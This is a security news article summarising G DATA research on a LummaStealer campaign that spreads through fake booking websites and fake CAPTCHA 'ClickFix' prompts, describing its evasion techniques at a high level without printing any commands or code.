Cybersecurity researchers at G DATA have uncovered a new malicious campaign leveraging fake booking websites to distribute the LummaStealer malware.
This sophisticated attack, discovered in early 2025, employs a fake CAPTCHA verification process to trick users into executing malicious commands on their systems.
The infection chain begins when victims visit a fraudulent payment confirmation URL, which redirects them to a fake booking itinerary page.
This page presents users with a deceptive CAPTCHA prompt, instructing them to execute a command via the Windows Run dialog.
Unbeknownst to the user, this action triggers a series of obfuscated scripts that ultimately download and execute the LummaStealer payload.
LummaStealer Evolves with New Tactics
LummaStealer, an information-stealing malware operating under a Malware-as-a-Service (MaaS) model, has expanded its distribution methods.
Previously spread through platforms like GitHub and Telegram, it now employs malvertising techniques on fake booking websites.
The campaign has shown a global reach, with observed targets in countries such as the Philippines and Germany.
The malware samples involved in this attack are significantly larger than previous versions, increasing in size by up to 350% (from 2MB to 9MB).
This inflation is likely due to binary padding, a technique used to evade detection by antivirus software.
The enlarged payloads are disguised as legitimate installers, further complicating detection efforts.
Advanced Evasion Techniques
LummaStealer continues to use sophisticated obfuscation methods, including Indirect Control Flow.
This technique employs Dispatcher Blocks to dynamically calculate target addresses at runtime, making analysis more challenging for security researchers.
The attack chain utilizes multiple stages of obfuscation and encryption, including ROT13 encoding and Base64 encoding.
These layers of complexity serve to conceal the malicious nature of the scripts and commands from both users and security software.
According to the researchers, this new campaign represents a significant evolution in LummaStealer’s tactics, drawing parallels with the infamous Emotet banking trojan.
The use of ClickFix social engineering techniques, combined with the malware’s expanding attack vectors, suggests that LummaStealer may continue to pose a substantial threat in the coming months.
Users are advised to exercise caution when interacting with booking confirmation emails or websites, especially those requiring unusual verification steps.
Security professionals should remain vigilant and continue to monitor for new iterations of this evolving threat.
As the cybersecurity landscape continues to evolve, it is crucial for both individuals and organizations to stay informed about the latest threats and maintain robust security practices to protect against sophisticated attacks like the LummaStealer campaign.
